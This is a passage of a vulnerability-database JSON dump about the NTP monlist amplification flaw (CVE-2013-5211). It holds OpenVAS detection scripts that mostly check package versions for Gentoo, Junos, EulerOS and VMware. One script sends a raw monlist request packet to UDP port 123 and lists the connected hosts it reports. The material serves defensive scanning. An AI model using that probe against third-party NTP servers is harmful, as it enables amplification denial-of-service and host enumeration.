"NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-07-07T14:26:45", "id": "NTP_ADVISORY.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:16", "description": "Gentoo Linux Local Security Checks GLSA 201401-08", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201401-08", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121105", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121105", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201401-08.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121105\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:32 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201401-08\");\n script_tag(name:\"insight\", value:\"ntpd is susceptible to a reflected Denial of Service attack. Please review the CVE identifiers and references below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201401-08\");\n script_cve_id(\"CVE-2013-5211\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201401-08\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-misc/ntp\", unaffected: make_list(\"ge 4.2.6_p5-r10\"), vulnerable: make_list(\"lt 4.2.6_p5-r10\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:43", "description": "DoS in NTP server", "cvss3": {}, "published": "2014-07-31T00:00:00", "type": "openvas", "title": "Junos NTP Server Amplification Denial of Service Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2018-10-25T00:00:00", "id": "OPENVAS:1361412562310105920", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105920", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_junos_cve_2013-5211.nasl 12095 2018-10-25 12:00:24Z cfischer $\n#\n# Junos NTP Server Amplification Denial of Service Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105920\");\n script_version(\"$Revision: 12095 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 14:00:24 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-31 13:20:03 +0200 (Thu, 31 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n\n script_name(\"Junos NTP Server Amplification Denial of Service Vulnerability\");\n\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"JunOS Local Security Checks\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", \"gb_junos_snmp_version.nasl\");\n script_mandatory_keys(\"Junos/Version\");\n\n script_tag(name:\"summary\", value:\"DoS in NTP server\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"When an NTP client or server is enabled within the [edit system\nntp] hierarchy level of the Junos configuration, REQ_MON_GETLIST and REQ_MON_GETLIST_1 control messages\nsupported by the monlist feature within NTP may allow remote attackers to cause a denial of service. NTP\nis not enabled in Junos by default.\");\n\n script_tag(name:\"impact\", value:\"If NTP is enabled an attacker can exploit the control messages to use\nit as part of a DoS attack against a remote victim or as the target of an attack against the device itself.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 11.4, 12.1, 12.2, 12.3, 13.1, 13.2, 13.3\");\n\n script_tag(name:\"solution\", value:\"New builds of Junos OS software are available from Juniper.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10613\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (revcomp(a:version, b:\"11.4R12\") < 0) {\n security_message(port:0, data:version);\n exit(0);\n}\n\nif (version =~ \"^12\") {\n if (revcomp(a:version, b:\"12.1R10\") < 0) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.1X44-D35\") < 0) &&\n (revcomp(a:version, b:\"12.1X44\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.1X45-D25\") < 0) &&\n (revcomp(a:version, b:\"12.1X45\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.1X46-D15\") < 0) &&\n (revcomp(a:version, b:\"12.1X46\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.1X47-D10\") < 0) &&\n (revcomp(a:version, b:\"12.1X47\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.2R8\") < 0) &&\n (revcomp(a:version, b:\"12.2\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.3R7\") < 0) &&\n (revcomp(a:version, b:\"12.3\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n}\n\nif (version =~ \"^13\") {\n if (revcomp(a:version, b:\"13.1R4-S2\") < 0) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"13.2R4\") < 0) &&\n (revcomp(a:version, b:\"13.2\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"13.3R2\") < 0) &&\n (revcomp(a:version, b:\"13.3\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-24T16:57:39", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-03-24T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1314)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2020-03-24T00:00:00", "id": "OPENVAS:1361412562311220201314", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201314", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1314\");\n script_version(\"2020-03-24T07:31:07+0000\");\n script_cve_id(\"CVE-2013-5211\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 07:31:07 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-24 07:31:07 +0000 (Tue, 24 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1314)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1314\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1314\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1314 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-09-25T13:24:16", "description": "NTP.org", "cvss3": {}, "published": "2014-01-06T00:00:00", "type": "openvas", "title": "NTP Monlist Feature Enabled", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2019-09-24T00:00:00", "id": "OPENVAS:1361412562310103868", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103868", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP Monlist Feature Enabled\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103868\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2013-5211\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-01-06 14:14:08 +0100 (Mon, 06 Jan 2014)\");\n script_name(\"NTP Monlist Feature Enabled\");\n script_category(ACT_ATTACK);\n script_family(\"Denial of Service\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"ntp_open.nasl\");\n script_require_udp_ports(\"Services/udp/ntp\", 123);\n script_mandatory_keys(\"ntp/remote/detected\");\n\n script_xref(name:\"URL\", value:\"http://bugs.ntp.org/show_bug.cgi?id=1532\");\n script_xref(name:\"URL\", value:\"http://lists.ntp.org/pipermail/pool/2011-December/005616.html\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to cause a denial\n of service.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a NTP monlist request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The monlist feature in ntp_request.c in ntpd in NTP before\n 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via\n forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.\");\n\n script_tag(name:\"solution\", value:\"Update to NTP.org's ntpd 4.2.7p26 or newer or set 'disable monitor' in ntp.conf.\");\n\n script_tag(name:\"summary\", value:\"NTP.org's ntpd is prone to a remote denial-of-service vulnerability because it\n fails to properly handle certain incoming network packets.\");\n\n script_tag(name:\"affected\", value:\"NTP.org's ntpd versions before 4.2.7p26. Other implementations might be affected as well.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_port_for_service(default:123, ipproto:\"udp\", proto:\"ntp\");\n\nsoc = open_sock_udp(port);\nif(!soc)\n exit(0);\n\n# http://lists.ntp.org/pipermail/pool/2011-December/005616.html\n# By default, recent 4.2.7 ntpd defaults to ignoring all mode 7 requests,\n# unless \"enable mode7\" is added to ntp.conf. In 4.2.7p26, the monlist\n# support code in ntpd was removed due to amplification risk\n\nreq = raw_string(0x17,0x00,0x03,0x2a,0x00,0x00,0x00,0x00,mkpad(40)); # ntpdc -n -c monlist <ip>\n\nsend(socket:soc, data:req);\nbuf = recv(socket:soc, length:1024);\nclose(soc);\n\nif(!buf || strlen(buf) < 8)\n exit(0);\n\nimplementation = ord(buf[2]);\nrequest_code = ord(buf[3]);\nrcount = getword(blob:buf, pos:4);\nrsize = getword(blob:buf, pos:6);\n\nif(rsize == 0 || (implementation != 2 && implementation != 3) || (request_code != 42 || rsize != 72))\n exit(0);\n\nstep = 8;\n\nfor(i = 0; i < rcount; i++) {\n hosts += ord(buf[step+16]) + \".\" + ord(buf[step+17]) + \".\" + ord(buf[step+18]) + \".\" + ord(buf[step+19]) + '\\n';\n step += rsize;\n}\n\nif(hosts)\n report = 'The Scanner was able to retrieve the following list of recent to this ntpd connected hosts:\\n\\n' + hosts + '\\n';\n\nsecurity_message(port:port, proto:\"udp\", data:report);\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:43", "description": "VMware vSphere updates to third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002: VMware vCenter updates to third party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2018-11-19T00:00:00", "id": "OPENVAS:1361412562310103917", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103917", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vcenter_VMSA-2014-0002.nasl 12419 2018-11-19 13:45:13Z cfischer $\n#\n# VMSA-2014-0002: VMware vCenter updates to third party libraries\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103917\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 12419 $\");\n script_name(\"VMSA-2014-0002: VMware vCenter updates to third party libraries\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-19 14:45:13 +0100 (Mon, 19 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:24:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"a. DDoS vulnerability in NTP third party libraries\n\n The NTP daemon has a DDoS vulnerability in the handling of thE\n 'monlist' command. An attacker may send a forged request to a\n vulnerable NTP server resulting in an amplified response to the\n intended target of the DDoS attack.\n\n b. Update to ESXi glibc package\n\n The ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\n resolve a security issue.\n\n c. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\n Oracle JRE is updated to version JRE 1.7 Update 45, which addresses\n multiple security issues that existed in earlier releases of Oracle JRE.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"VMware vSphere updates to third party libraries.\");\n\n script_tag(name:\"affected\", value:\"VMware vCenter Server 5.5 prior 5.5 Update 1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\"))exit(0);\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\"))exit(0);\n\nfixed_builds = make_array( \"5.5.0\", \"1623099\" );\n\nif ( ! fixed_builds[ vcenter_version] ) exit( 0 );\n\nif ( int( vcenter_build ) < int( fixed_builds[ vcenter_version ] ) ) {\n security_message( port:0, data:esxi_remote_report( ver:vcenter_version, build:vcenter_build, fixed_build:fixed_builds[vcenter_version], typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:42", "description": "VMware has updated vSphere third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002: VMware vSphere updates to third party libraries (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2018-11-19T00:00:00", "id": "OPENVAS:1361412562310103916", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103916", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2014-0002_remote.nasl 12419 2018-11-19 13:45:13Z cfischer $\n#\n# VMSA-2014-0002: VMware vSphere updates to third party libraries (remote check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103916\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 12419 $\");\n script_name(\"VMSA-2014-0002: VMware vSphere updates to third party libraries (remote check)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-19 14:45:13 +0100 (Mon, 19 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:04:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esx_web_detect.nasl\");\n script_mandatory_keys(\"VMware/ESX/build\", \"VMware/ESX/version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"a. DDoS vulnerability in NTP third party libraries\n\n The NTP daemon has a DDoS vulnerability in the handling of the\n 'monlist' command. An attacker may send a forged request to a\n vulnerable NTP server resulting in an amplified response to the\n intended target of the DDoS attack.\n\n b. Update to ESXi glibc package\n\n The ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\n resolve a security issue.\n\n c. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\n Oracle JRE is updated to version JRE 1.7 Update 45, which addresses\n multiple security issues that existed in earlier releases of Oracle JRE.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"VMware has updated vSphere third party libraries.\");\n\n script_tag(name:\"affected\", value:\"vCenter Server Appliance 5.5 prior to 5.5 Update 1\n\n VMware vCenter Server 5.5 prior 5.5 Update 1\n\n VMware Update Manager 5.5 prior 5.5 Update 1\n\n VMware ESXi 5.5 without patch ESXi550-201403101-SG.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\n\nif( ! esxVersion = get_kb_item( \"VMware/ESX/version\" ) ) exit( 0 );\nif( ! esxBuild = get_kb_item( \"VMware/ESX/build\" ) ) exit( 0 );\n\nfixed_builds = make_array( \"5.5.0\", \"1623387\" );\n\nif( ! fixed_builds[esxVersion] ) exit( 0 );\n\nif( int( esxBuild ) < int( fixed_builds[esxVersion] ) ) {\n security_message(port:0, data:esxi_remote_report( ver:esxVersion, build:esxBuild, fixed_build:fixed_builds[esxVersion] ) );\n exit(0);\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-19T16:07:05", "description": "VMware has updated vSphere third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMware ESXi/ESX updates to third party libraries (VMSA-2014-0002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2019-12-18T00:00:00", "id": "OPENVAS:1361412562310103915", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103915", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2014-0002: VMware vSphere updates to third party libraries\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103915\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESXi/ESX updates to third party libraries (VMSA-2014-0002)\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:04:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"insight\", value:\"a. DDoS vulnerability in NTP third party libraries\n\n The NTP daemon has a DDoS vulnerability in the handling of the\n 'monlist' command. An attacker may send a forged request to a\n vulnerable NTP server resulting in an amplified response to the\n intended target of the DDoS attack.\n\n b. Update to ESXi glibc package\n\n The ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\n resolve a security issue.\n\n c. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\n Oracle JRE is updated to version JRE 1.7 Update 45, which addresses\n multiple security issues that existed in earlier releases of Oracle JRE.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"VMware has updated vSphere third party libraries.\");\n\n script_tag(name:\"affected\", value:\"VMware 